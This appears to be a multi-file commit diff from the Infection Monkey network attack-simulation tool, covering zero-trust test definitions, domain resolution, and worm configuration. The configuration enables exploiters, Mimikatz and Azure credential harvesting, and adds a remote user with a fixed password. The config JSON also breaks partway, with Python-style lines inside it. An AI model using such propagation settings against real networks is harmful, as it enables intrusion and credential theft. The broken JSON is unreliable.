TEST_MACHINE_EXPLOITED = u"machine_exploited"
TEST_ENDPOINT_SECURITY_EXISTS = u"endpoint_security_exists"
TEST_SCHEDULED_EXECUTION = u"scheduled_execution"
TEST_MALICIOUS_ACTIVITY_TIMELINE = u"malicious_activity_timeline"
TEST_SEGMENTATION = u"segmentation"
TEST_TUNNELING = u"tunneling"
TEST_COMMUNICATE_AS_NEW_USER = u"communicate_as_new_user"
TESTS = (
TEST_SEGMENTATION,
TEST_MALICIOUS_ACTIVITY_TIMELINE,
TEST_SCHEDULED_EXECUTION,
TEST_ENDPOINT_SECURITY_EXISTS,
TEST_MACHINE_EXPLOITED,
TEST_DATA_ENDPOINT_HTTP,
TEST_DATA_ENDPOINT_ELASTIC,
TEST_TUNNELING,
TEST_COMMUNICATE_AS_NEW_USER
)
PRINCIPLE_DATA_TRANSIT = u"data_transit"
PRINCIPLE_ENDPOINT_SECURITY = u"endpoint_security"
PRINCIPLE_USER_BEHAVIOUR = u"user_behaviour"
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC = u"analyze_network_traffic"
PRINCIPLE_SEGMENTATION = u"segmentation"
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES = u"network_policies"
PRINCIPLE_USERS_MAC_POLICIES = u"users_mac_policies"
PRINCIPLES = {
PRINCIPLE_SEGMENTATION: u"Apply segmentation and micro-segmentation inside your network.",
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: u"Analyze network traffic for malicious activity.",
PRINCIPLE_USER_BEHAVIOUR: u"Adopt security user behavior analytics.",
PRINCIPLE_ENDPOINT_SECURITY: u"Use anti-virus and other traditional endpoint security solutions.",
PRINCIPLE_DATA_TRANSIT: u"Secure data at transit by encrypting it.",
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: u"Configure network policies to be as restrictive as possible.",
PRINCIPLE_USERS_MAC_POLICIES: u"Users' permissions to the network and to resources should be MAC (Mandetory "
u"Access Control) only.",
}
POSSIBLE_STATUSES_KEY = u"possible_statuses"
PILLARS_KEY = u"pillars"
PRINCIPLE_KEY = u"principle_key"
FINDING_EXPLANATION_BY_STATUS_KEY = u"finding_explanation"
TEST_EXPLANATION_KEY = u"explanation"
TESTS_MAP = {
TEST_SEGMENTATION: {
TEST_EXPLANATION_KEY: u"The Monkey tried to scan and find machines that it can communicate with from the machine it's running on, that belong to different network segments.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs."
},
PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
PILLARS_KEY: [NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED]
},
TEST_MALICIOUS_ACTIVITY_TIMELINE: {
TEST_EXPLANATION_KEY: u"The Monkeys in the network performed malicious-looking actions, like scanning and attempting exploitation.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
},
PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
},
TEST_ENDPOINT_SECURITY_EXISTS: {
TEST_EXPLANATION_KEY: u"The Monkey checked if there is an active process of an endpoint security software.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus software on endpoints.",
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a security concern."
},
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY: [DEVICES],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
},
TEST_MACHINE_EXPLOITED: {
TEST_EXPLANATION_KEY: u"The Monkey tries to exploit machines in order to breach them and propagate in the network.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see which endpoints were compromised.",
STATUS_PASSED: "Monkey didn't manage to exploit an endpoint."
},
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY: [DEVICES],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY]
},
TEST_SCHEDULED_EXECUTION: {
TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security software.",
STATUS_PASSED: "Monkey failed to execute in a scheduled manner."
},
PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
PILLARS_KEY: [PEOPLE, NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
},
TEST_DATA_ENDPOINT_ELASTIC: {
TEST_EXPLANATION_KEY: u"The Monkey scanned for unencrypted access to ElasticSearch instances.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts that indicate attempts to access them."
},
PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
},
TEST_DATA_ENDPOINT_HTTP: {
TEST_EXPLANATION_KEY: u"The Monkey scanned for unencrypted access to HTTP servers.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate attempts to access them."
},
PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
},
TEST_TUNNELING: {
TEST_EXPLANATION_KEY: u"The Monkey tried to tunnel traffic using other monkeys.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - restrict them."
},
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED]
},
TEST_COMMUNICATE_AS_NEW_USER: {
TEST_EXPLANATION_KEY: u"The Monkey tried to create a new user and communicate with the internet from it.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - restrict them to MAC only.",
STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network."
},
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
},
}
EVENT_TYPE_MONKEY_NETWORK = "monkey_network"
EVENT_TYPE_MONKEY_LOCAL = "monkey_local"
EVENT_TYPES = (EVENT_TYPE_MONKEY_LOCAL, EVENT_TYPE_MONKEY_NETWORK)
PILLARS_TO_TESTS = {
DATA: [],
PEOPLE: [],
NETWORKS: [],
DEVICES: [],
WORKLOADS: [],
VISIBILITY_ANALYTICS: [],
AUTOMATION_ORCHESTRATION: []
}
PRINCIPLES_TO_TESTS = {}
PRINCIPLES_TO_PILLARS = {}
def populate_mappings():
populate_pillars_to_tests()
populate_principles_to_tests()
populate_principles_to_pillars()
def populate_pillars_to_tests():
for pillar in PILLARS:
for test, test_info in TESTS_MAP.items():
if pillar in test_info[PILLARS_KEY]:
PILLARS_TO_TESTS[pillar].append(test)
def populate_principles_to_tests():
for single_principle in PRINCIPLES:
PRINCIPLES_TO_TESTS[single_principle] = []
for test, test_info in TESTS_MAP.items():
PRINCIPLES_TO_TESTS[test_info[PRINCIPLE_KEY]].append(test)
def populate_principles_to_pillars():
for principle, principle_tests in PRINCIPLES_TO_TESTS.items():
principles_pillars = set()
for test in principle_tests:
for pillar in TESTS_MAP[test][PILLARS_KEY]:
principles_pillars.add(pillar)
PRINCIPLES_TO_PILLARS[principle] = principles_pillars
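After populate_mappings() runs (common/data/__init__.py above calls it on import), the three lookup tables can be queried directly. An illustrative sketch, assuming the module lives at common.data.zero_trust_consts; list ordering depends on dict iteration order:
import common.data.zero_trust_consts as zt_consts  # importing the package already ran populate_mappings()

print(zt_consts.PILLARS_TO_TESTS[zt_consts.NETWORKS])
# e.g. [u'segmentation', u'malicious_activity_timeline', u'scheduled_execution', u'tunneling', u'communicate_as_new_user']
print(zt_consts.PRINCIPLES_TO_TESTS[zt_consts.PRINCIPLE_DATA_TRANSIT])
# [u'unencrypted_data_endpoint_http', u'unencrypted_data_endpoint_elastic'] (order may vary)
print(zt_consts.PRINCIPLES_TO_PILLARS[zt_consts.PRINCIPLE_DATA_TRANSIT])
# set([u'Data'])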

View File

@ -5,9 +5,12 @@ from abc import ABCMeta, abstractmethod
import ipaddress
from six import text_type
import logging
__author__ = 'itamar'
LOG = logging.getLogger(__name__)
class NetworkRange(object):
__metaclass__ = ABCMeta
@ -47,12 +50,23 @@ class NetworkRange(object):
address_str = address_str.strip()
if not address_str: # Empty string
return None
if -1 != address_str.find('-'):
if NetworkRange.check_if_range(address_str):
return IpRange(ip_range=address_str)
if -1 != address_str.find('/'):
return CidrRange(cidr_range=address_str)
return SingleIpRange(ip_address=address_str)
@staticmethod
def check_if_range(address_str):
if -1 != address_str.find('-'):
ips = address_str.split('-')
try:
ipaddress.ip_address(ips[0])
ipaddress.ip_address(ips[1])
except ValueError:
return False
return True
return False
@staticmethod
def _ip_to_number(address):
return struct.unpack(">L", socket.inet_aton(address))[0]
@ -111,13 +125,58 @@ class IpRange(NetworkRange):
class SingleIpRange(NetworkRange):
def __init__(self, ip_address, shuffle=True):
super(SingleIpRange, self).__init__(shuffle=shuffle)
self._ip_address = ip_address
self._ip_address, self.domain_name = self.string_to_host(ip_address)
def __repr__(self):
return "<SingleIpRange %s>" % (self._ip_address,)
def __iter__(self):
"""
We have to check if we have an IP to return, because the user could have entered an invalid
domain name and no IP was found
:return: IP if there is one
"""
if self.ip_found():
yield self._number_to_ip(self.get_range()[0])
def is_in_range(self, ip_address):
return self._ip_address == ip_address
def _get_range(self):
return [SingleIpRange._ip_to_number(self._ip_address)]
def ip_found(self):
"""
Checks if the domain name entered could be translated into an IP address
:return: True if DNS resolved the domain name, False otherwise
"""
return self._ip_address
@staticmethod
def string_to_host(string):
"""
Converts the string that the user entered in "Scan IP/subnet list" to a tuple of IP and domain name
:param string: String that was entered in "Scan IP/subnet list"
:return: A tuple in the format (IP, domain_name), e.g. (192.168.55.1, www.google.com)
"""
# The most common use case is to enter ip/range into "Scan IP/subnet list"
domain_name = ''
# Make sure to have unicode string
user_input = string.decode('utf-8', 'ignore')
# Try casting user's input as IP
try:
ip = ipaddress.ip_address(user_input).exploded
except ValueError:
# Exception means that it's a domain name
try:
ip = socket.gethostbyname(string)
domain_name = string
except socket.error:
LOG.error("Your specified host: {} is not found as a domain name and"
" it's not an IP address".format(string))
return None, string
# If a string other than an IP was entered, we presume it was a domain name and resolve it
return ip, domain_name
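A short sketch of what the new domain-name handling produces for SingleIpRange (the IP and hostnames are illustrative):
from common.network.network_range import SingleIpRange

ip_range = SingleIpRange('192.168.55.1')     # plain IP: _ip_address='192.168.55.1', domain_name=''
host_range = SingleIpRange('localhost')      # hostname: _ip_address=resolved IP, domain_name='localhost'
print(host_range.domain_name)                # 'localhost'
print(list(host_range))                      # the single resolved IP, if the DNS lookup succeeded
print(list(SingleIpRange('no.such.host.invalid')))  # [] -- ip_found() is falsy, so nothing is yielded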

View File

@ -0,0 +1,23 @@
def get_ip_in_src_and_not_in_dst(ip_addresses, source_subnet, target_subnet):
"""
Finds an IP address in ip_addresses which is in source_subnet but not in target_subnet.
:param ip_addresses: List[str]: List of IP addresses to test.
:param source_subnet: NetworkRange: Subnet we want an IP to be in.
:param target_subnet: NetworkRange: Subnet we want an IP to not be in.
:return: The cross segment IP if in source but not in target, else None. Union[str, None]
"""
if get_ip_if_in_subnet(ip_addresses, target_subnet) is not None:
return None
return get_ip_if_in_subnet(ip_addresses, source_subnet)
def get_ip_if_in_subnet(ip_addresses, subnet):
"""
:param ip_addresses: IP address list.
:param subnet: Subnet (a common.network.network_range.NetworkRange) to check the IP addresses against.
:return: The first IP in ip_addresses which is in the subnet if there is one, otherwise returns None.
"""
for ip_address in ip_addresses:
if subnet.is_in_range(ip_address):
return ip_address
return None

View File

@ -0,0 +1,30 @@
from common.network.network_range import *
from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
class TestSegmentationUtils(IslandTestCase):
def test_get_ip_in_src_and_not_in_dst(self):
self.fail_if_not_testing_env()
source = CidrRange("1.1.1.0/24")
target = CidrRange("2.2.2.0/24")
# IP not in both
self.assertIsNone(get_ip_in_src_and_not_in_dst(
[text_type("3.3.3.3"), text_type("4.4.4.4")], source, target
))
# IP not in source, in target
self.assertIsNone(get_ip_in_src_and_not_in_dst(
[text_type("2.2.2.2")], source, target
))
# IP in source, not in target
self.assertIsNotNone(get_ip_in_src_and_not_in_dst(
[text_type("8.8.8.8"), text_type("1.1.1.1")], source, target
))
# IP in both subnets
self.assertIsNone(get_ip_in_src_and_not_in_dst(
[text_type("8.8.8.8"), text_type("1.1.1.1")], source, source
))

View File

@ -0,0 +1,36 @@
from enum import Enum
class ScanStatus(Enum):
# Technique wasn't scanned
UNSCANNED = 0
# Technique was attempted/scanned
SCANNED = 1
# Technique was attempted and succeeded
USED = 2
class UsageEnum(Enum):
SMB = {ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.",
ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR."}
MIMIKATZ = {ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.",
ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed."}
MIMIKATZ_WINAPI = {ScanStatus.USED.value: "WinAPI was called to load mimikatz.",
ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz."}
DROPPER = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."}
SINGLETON_WINAPI = {ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.",
ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton"
" for monkey process wasn't successful."}
DROPPER_WINAPI = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."}
# Dict that describes what BITS job was used for
BITS_UPLOAD_STRING = "BITS job was used to upload monkey to a remote system."
def format_time(time):
return "%s-%s %s:%s:%s" % (time.date().month,
time.date().day,
time.time().hour,
time.time().minute,
time.time().second)
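For reference, format_time produces a month-day timestamp with no zero padding; for example:
from datetime import datetime
format_time(datetime(2019, 10, 28, 15, 14, 53))   # '10-28 15:14:53'
format_time(datetime(2019, 1, 5, 9, 3, 7))        # '1-5 9:3:7' -- single-digit values are not padded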

View File

@ -0,0 +1,10 @@
# abstract, static method decorator
class abstractstatic(staticmethod):
__slots__ = ()
def __init__(self, function):
super(abstractstatic, self).__init__(function)
function.__isabstractmethod__ = True
__isabstractmethod__ = True
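Python 2 has no built-in abstract staticmethod, which is what the decorator above supplies. A minimal sketch of how it is meant to be used together with ABCMeta (the Collector classes are made up for illustration, and abstractstatic is assumed to be in scope):
from abc import ABCMeta

class Collector(object):
    __metaclass__ = ABCMeta

    @abstractstatic          # the decorator defined above
    def collect():
        pass

class RamCollector(Collector):
    @staticmethod
    def collect():
        return 'ram info'

RamCollector().collect()     # fine -- the abstract static method was overridden
# Collector() would raise TypeError: can't instantiate abstract class with abstract method collect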

View File

@ -0,0 +1,7 @@
from enum import Enum
class ExploitType(Enum):
VULNERABILITY = 1
OTHER = 8
BRUTE_FORCE = 9

View File

@ -1,2 +1,2 @@
#!/bin/bash
pyinstaller --clean monkey-linux.spec
pyinstaller -F --log-level=DEBUG --clean monkey.spec

View File

@ -1 +1 @@
pyinstaller -F --log-level=DEBUG --clean --upx-dir=.\bin monkey.spec
pyinstaller -F --log-level=DEBUG --clean --upx-dir=.\bin monkey.spec

View File

@ -1,3 +1,4 @@
import hashlib
import os
import json
import sys
@ -7,17 +8,17 @@ from abc import ABCMeta
from itertools import product
import importlib
importlib.import_module('infection_monkey', 'network')
__author__ = 'itamar'
GUID = str(uuid.getnode())
EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'monkey.bin')
SENSITIVE_FIELDS = ["exploit_password_list", "exploit_user_list"]
HIDDEN_FIELD_REPLACEMENT_CONTENT = "hidden"
class Configuration(object):
def from_kv(self, formatted_data):
# now we won't work at <2.7 for sure
network_import = importlib.import_module('infection_monkey.network')
@ -35,9 +36,6 @@ class Configuration(object):
if key == 'finger_classes':
class_objects = [getattr(network_import, val) for val in value]
setattr(self, key, class_objects)
elif key == 'scanner_class':
scanner_object = getattr(network_import, value)
setattr(self, key, scanner_object)
elif key == 'exploiter_classes':
class_objects = [getattr(exploit_import, val) for val in value]
setattr(self, key, class_objects)
@ -58,6 +56,12 @@ class Configuration(object):
result = self.from_kv(formatted_data)
return result
@staticmethod
def hide_sensitive_info(config_dict):
for field in SENSITIVE_FIELDS:
config_dict[field] = HIDDEN_FIELD_REPLACEMENT_CONTENT
return config_dict
def as_dict(self):
result = {}
for key in dir(Configuration):
@ -105,8 +109,8 @@ class Configuration(object):
dropper_set_date = True
dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
dropper_date_reference_path_linux = '/bin/sh'
dropper_target_path_win_32 = r"C:\Windows\monkey32.exe"
dropper_target_path_win_64 = r"C:\Windows\monkey64.exe"
dropper_target_path_win_32 = r"C:\Windows\temp\monkey32.exe"
dropper_target_path_win_64 = r"C:\Windows\temp\monkey64.exe"
dropper_target_path_linux = '/tmp/monkey'
###########################
@ -133,15 +137,14 @@ class Configuration(object):
# how many scan iterations to perform on each run
max_iterations = 1
scanner_class = None
finger_classes = []
exploiter_classes = []
# how many victims to look for in a single scan iteration
victims_max_find = 30
victims_max_find = 100
# how many victims to exploit before stopping
victims_max_exploit = 7
victims_max_exploit = 15
# depth of propagation
depth = 2
@ -159,10 +162,13 @@ class Configuration(object):
retry_failed_explotation = True
# addresses of internet servers to ping and check if the monkey has internet access.
internet_services = ["monkey.guardicore.com", "www.google.com"]
internet_services = ["updates.infectionmonkey.com", "www.google.com"]
keep_tunnel_open_time = 60
# Monkey files directory name
monkey_dir_name = 'monkey_dir'
###########################
# scanners config
###########################
@ -177,7 +183,7 @@ class Configuration(object):
# TCP Scanner
HTTP_PORTS = [80, 8080, 443,
8008, # HTTP alternate
8008, # HTTP alternate
7001 # Oracle Weblogic default server port
]
tcp_target_ports = [22,
@ -193,7 +199,7 @@ class Configuration(object):
9200]
tcp_target_ports.extend(HTTP_PORTS)
tcp_scan_timeout = 3000 # 3000 Milliseconds
tcp_scan_interval = 200
tcp_scan_interval = 0 # in milliseconds
tcp_scan_get_banner = True
# Ping Scanner
@ -203,14 +209,12 @@ class Configuration(object):
# exploiters config
###########################
should_exploit = True
skip_exploit_if_file_exist = False
ms08_067_exploit_attempts = 5
ms08_067_remote_user_add = "Monkey_IUSER_SUPPORT"
ms08_067_remote_user_pass = "Password1!"
# rdp exploiter
rdp_use_vbs_download = True
user_to_add = "Monkey_IUSER_SUPPORT"
remote_user_pass = "Password1!"
# User and password dictionaries for exploits.
@ -268,5 +272,23 @@ class Configuration(object):
extract_azure_creds = True
post_breach_actions = []
custom_PBA_linux_cmd = ""
custom_PBA_windows_cmd = ""
PBA_linux_filename = None
PBA_windows_filename = None
@staticmethod
def hash_sensitive_data(sensitive_data):
"""
Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data in plain text, since the log is
saved on client machines in plain text.
:param sensitive_data: the data to hash.
:return: the hashed data.
"""
password_hashed = hashlib.sha512(sensitive_data).hexdigest()
return password_hashed
WormConfiguration = Configuration()
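hash_sensitive_data is what keeps credentials out of the client-side log: the configuration dump and the MSSQL brute-force logging below pass passwords through it first. An illustrative call (the password is made up; the output is a 128-character SHA-512 hex digest):
digest = Configuration.hash_sensitive_data('Password1!')   # Python 2 str; on Python 3 this would need bytes
print(len(digest))                                          # 128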

View File

@ -9,7 +9,7 @@ from requests.exceptions import ConnectionError
import infection_monkey.monkeyfs as monkeyfs
import infection_monkey.tunnel as tunnel
from infection_monkey.config import WormConfiguration, GUID
from infection_monkey.network.info import local_ips, check_internet_access
from infection_monkey.network.info import local_ips, check_internet_access, TIMEOUT
from infection_monkey.transport.http import HTTPConnectProxy
from infection_monkey.transport.tcp import TcpProxy
@ -19,9 +19,12 @@ requests.packages.urllib3.disable_warnings()
LOG = logging.getLogger(__name__)
DOWNLOAD_CHUNK = 1024
PBA_FILE_DOWNLOAD = "https://%s/api/pba/download/%s"
# Timeout (in seconds), deliberately greater than 5,
# so the monkey doesn't wait forever trying to connect to an island before going elsewhere.
TIMEOUT = 15
TIMEOUT_IN_SECONDS = 15
class ControlClient(object):
@ -76,7 +79,7 @@ class ControlClient(object):
requests.get("https://%s/api?action=is-up" % (server,),
verify=False,
proxies=ControlClient.proxies,
timeout=TIMEOUT)
timeout=TIMEOUT_IN_SECONDS)
WormConfiguration.current_server = current_server
break
@ -120,11 +123,12 @@ class ControlClient(object):
return {}
@staticmethod
def send_telemetry(telem_type, data):
def send_telemetry(telem_category, data):
if not WormConfiguration.current_server:
LOG.error("Trying to send %s telemetry before current server is established, aborting." % telem_category)
return
try:
telemetry = {'monkey_guid': GUID, 'telem_type': telem_type, 'data': data}
telemetry = {'monkey_guid': GUID, 'telem_category': telem_category, 'data': data}
reply = requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,),
data=json.dumps(telemetry),
headers={'content-type': 'application/json'},
@ -165,7 +169,8 @@ class ControlClient(object):
try:
unknown_variables = WormConfiguration.from_kv(reply.json().get('config'))
LOG.info("New configuration was loaded from server: %r" % (WormConfiguration.as_dict(),))
LOG.info("New configuration was loaded from server: %r" %
(WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()),))
except Exception as exc:
# we don't continue with default conf here because it might be dangerous
LOG.error("Error parsing JSON reply from control server %s (%s): %s",
@ -306,3 +311,13 @@ class ControlClient(object):
target_addr, target_port = None, None
return tunnel.MonkeyTunnel(proxy_class, target_addr=target_addr, target_port=target_port)
@staticmethod
def get_pba_file(filename):
try:
return requests.get(PBA_FILE_DOWNLOAD %
(WormConfiguration.current_server, filename),
verify=False,
proxies=ControlClient.proxies)
except requests.exceptions.RequestException:
return False
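With the rename, every report the monkey sends is keyed by telem_category rather than telem_type. A sketch of the JSON body that send_telemetry posts to /api/telemetry (the GUID and data values are invented):
telemetry = {
    'monkey_guid': '123456789',          # GUID is derived from uuid.getnode() at startup
    'telem_category': 'exploit',
    'data': {'result': True, 'exploiter': 'HadoopExploiter'}
}
# POSTed as JSON to https://<island>/api/telemetry with content-type: application/json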

View File

@ -11,9 +11,11 @@ from ctypes import c_char_p
import filecmp
from infection_monkey.config import WormConfiguration
from infection_monkey.exploit.tools import build_monkey_commandline_explicitly
from infection_monkey.exploit.tools.helpers import build_monkey_commandline_explicitly
from infection_monkey.model import MONKEY_CMDLINE_WINDOWS, MONKEY_CMDLINE_LINUX, GENERAL_CMDLINE_LINUX
from infection_monkey.system_info import SystemInfoCollector, OperatingSystem
from infection_monkey.telemetry.attack.t1106_telem import T1106Telem
from common.utils.attack_utils import ScanStatus, UsageEnum
if "win32" == sys.platform:
from win32process import DETACHED_PROCESS
@ -51,7 +53,6 @@ class MonkeyDrops(object):
LOG.debug("Dropper is running with config:\n%s", pprint.pformat(self._config))
def start(self):
if self._config['destination_path'] is None:
LOG.error("No destination path specified")
return False
@ -157,5 +158,6 @@ class MonkeyDrops(object):
else:
LOG.debug("Dropper source file '%s' is marked for deletion on next boot",
self._config['source_path'])
T1106Telem(ScanStatus.USED, UsageEnum.DROPPER_WINAPI).send()
except AttributeError:
LOG.error("Invalid configuration options. Failing")

View File

@ -1,4 +1,5 @@
{
"should_exploit": true,
"command_servers": [
"192.0.2.0:5000"
],
@ -8,7 +9,7 @@
],
"keep_tunnel_open_time": 60,
"subnet_scan_list": [
],
"inaccessible_subnets": [],
"blocked_ips": [],
@ -16,6 +17,7 @@
"alive": true,
"collect_system_info": true,
"extract_azure_creds": true,
"should_use_mimikatz": true,
"depth": 2,
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
@ -23,10 +25,11 @@
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
"dropper_log_path_linux": "/tmp/user-1562",
"dropper_set_date": true,
"dropper_target_path_win_32": "C:\\Windows\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\monkey64.exe",
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_target_path_linux": "/tmp/monkey",
"monkey_dir_name": "monkey_dir",
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not",
@ -40,7 +43,9 @@
"SambaCryExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter"
"HadoopExploiter",
"VSFTPDExploiter",
"MSSQLExploiter"
],
"finger_classes": [
"SSHFinger",
@ -56,14 +61,12 @@
"monkey_log_path_linux": "/tmp/user-1563",
"send_log_to_server": true,
"ms08_067_exploit_attempts": 5,
"ms08_067_remote_user_add": "Monkey_IUSER_SUPPORT",
"ms08_067_remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT",
"remote_user_pass": "Password1!",
"ping_scan_timeout": 10000,
"rdp_use_vbs_download": true,
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey",
"retry_failed_explotation": true,
"scanner_class": "TcpScanner",
"self_delete_in_cleanup": true,
"serialize_config": false,
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}",
@ -78,7 +81,7 @@
"sambacry_shares_not_to_check": ["IPC$", "print$"],
"local_network_scan": false,
"tcp_scan_get_banner": true,
"tcp_scan_interval": 200,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 10000,
"tcp_target_ports": [
22,
@ -91,10 +94,16 @@
3306,
8008,
9200,
7001
7001,
8088
],
"timeout_between_iterations": 10,
"use_file_logging": true,
"victims_max_exploit": 7,
"victims_max_find": 30
"victims_max_exploit": 15,
"victims_max_find": 100,
"post_breach_actions" : []
custom_PBA_linux_cmd = ""
custom_PBA_windows_cmd = ""
PBA_linux_filename = None
PBA_windows_filename = None
}

View File

@ -1,5 +1,7 @@
from abc import ABCMeta, abstractmethod
from abc import ABCMeta, abstractmethod, abstractproperty
import infection_monkey.config
from common.utils.exploit_enum import ExploitType
from datetime import datetime
__author__ = 'itamar'
@ -9,35 +11,75 @@ class HostExploiter(object):
_TARGET_OS_TYPE = []
# Usual values are 'vulnerability' or 'brute_force'
EXPLOIT_TYPE = ExploitType.VULNERABILITY
@abstractproperty
def _EXPLOITED_SERVICE(self):
pass
def __init__(self, host):
self._config = infection_monkey.config.WormConfiguration
self._exploit_info = {}
self._exploit_attempts = []
self.exploit_info = {'display_name': self._EXPLOITED_SERVICE,
'started': '',
'finished': '',
'vulnerable_urls': [],
'vulnerable_ports': [],
'executed_cmds': []}
self.exploit_attempts = []
self.host = host
def set_start_time(self):
self.exploit_info['started'] = datetime.now().isoformat()
def set_finish_time(self):
self.exploit_info['finished'] = datetime.now().isoformat()
def is_os_supported(self):
return self.host.os.get('type') in self._TARGET_OS_TYPE
def send_exploit_telemetry(self, result):
from infection_monkey.control import ControlClient
ControlClient.send_telemetry(
'exploit',
{'result': result, 'machine': self.host.__dict__, 'exploiter': self.__class__.__name__,
'info': self._exploit_info, 'attempts': self._exploit_attempts})
from infection_monkey.telemetry.exploit_telem import ExploitTelem
ExploitTelem(self, result).send()
def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''):
self._exploit_attempts.append({'result': result, 'user': user, 'password': password,
self.exploit_attempts.append({'result': result, 'user': user, 'password': password,
'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key})
@abstractmethod
def exploit_host(self):
self.pre_exploit()
result = self._exploit_host()
self.post_exploit()
return result
def pre_exploit(self):
self.set_start_time()
def post_exploit(self):
self.set_finish_time()
@abstractmethod
def _exploit_host(self):
raise NotImplementedError()
def add_vuln_url(self, url):
self.exploit_info['vulnerable_urls'].append(url)
def add_vuln_port(self, port):
self.exploit_info['vulnerable_ports'].append(port)
def add_executed_cmd(self, cmd):
"""
Appends command to exploiter's info.
:param cmd: String of executed command. e.g. 'echo Example'
"""
powershell = "powershell" in cmd.lower()
self.exploit_info['executed_cmds'].append({'cmd': cmd, 'powershell': powershell})
from infection_monkey.exploit.win_ms08_067 import Ms08_067_Exploiter
from infection_monkey.exploit.wmiexec import WmiExploiter
from infection_monkey.exploit.smbexec import SmbExploiter
from infection_monkey.exploit.rdpgrinder import RdpExploiter
from infection_monkey.exploit.sshexec import SSHExploiter
